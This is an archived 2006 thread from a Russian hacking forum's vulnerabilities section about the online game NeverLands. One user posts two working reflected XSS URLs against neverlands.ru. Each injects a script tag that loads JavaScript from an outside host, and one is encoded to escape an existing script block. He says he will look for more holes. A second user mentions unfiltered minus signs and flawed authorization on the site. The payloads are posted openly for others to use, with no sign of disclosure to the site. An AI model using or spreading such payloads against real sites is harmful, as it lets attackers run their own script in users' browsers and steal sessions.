Форум АНТИЧАТ - Он-лайн игра NeverLands

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Он-лайн игра NeverLands - XSS (pssiv) (https://forum.antichat.xyz/showthread.php?t=18870)

EST a1ien

10.05.2006 09:34

Он-лайн игра NeverLands - XSS (passiv)

В этой игре нашол XSS.

Код:

http://neverlands.ru/ch.php?lo=1&r=><script src=http://esteam.net.ru/script.js></script>

Несомневаюсь что есть ещё чтото щас дальше копать буду :).

EST a1ien

12.05.2006 08:38

А вот ещё одна прямо на главной

Код:

http://neverlands.ru/index.cgi?error=block&block=%3C/SCRIPT%3E%3Cscript%20src=http://esteam.net.ru/script.js%3E%3C/script%3E

TRes	20.05.2006 17:28

Проект вообще очень сырой... Там такие баги были детские... Не было фильтрации минуса, например... Авторизация у них тоже с глюками была...

Время: 17:08